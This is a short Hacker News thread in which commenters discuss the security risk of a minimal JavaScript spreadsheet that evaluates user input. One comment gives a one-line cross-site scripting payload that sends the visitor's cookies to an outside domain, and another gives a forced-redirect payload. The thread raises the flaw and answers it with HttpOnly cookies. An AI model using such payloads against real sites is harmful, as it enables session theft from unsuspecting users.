Hacker News
new
|
past
|
comments
|
ask
|
show
|
jobs
|
submit
|
araskoktas's comments
login
araskoktas
on Nov 13, 2013
|
parent
|
context
[–]
| on:
A spreadsheet in fewer than 30 lines of JavaScript...
document.write('<img src="somedomain.com/?'+document.cookie);
cosarara97
on Nov 13, 2013
|
parent
|
next
[–]
But you'd need to send a spreadsheet with that to the victim.
araskoktas
on Nov 13, 2013
|
root
|
parent
|
next
[–]
Well yes, the idea is the sheet being open to a group of people for collaboration or whatever reason.
genericacct
on Nov 13, 2013
|
parent
|
prev
[–]
have you heard of the HttpOnly attribute for cookies?
araskoktas
on Nov 13, 2013
|
root
|
parent
[–]
good, send HttpOnly cookies and solve that problem. window.location.href='
http://www.redt*be.com';
-- if you think evaluating JS code, as-is passed by the client is a good idea go ahead.
genericacct
on Nov 13, 2013
|
root
|
parent
[–]
I most definitely will. and if my users want to browse your favorite porn site i don't see why i shouldn't let them..
Guidelines
|
FAQ
|
Lists
|
API
|
Security
|
Legal
|
Apply to YC
|
Contact
Search: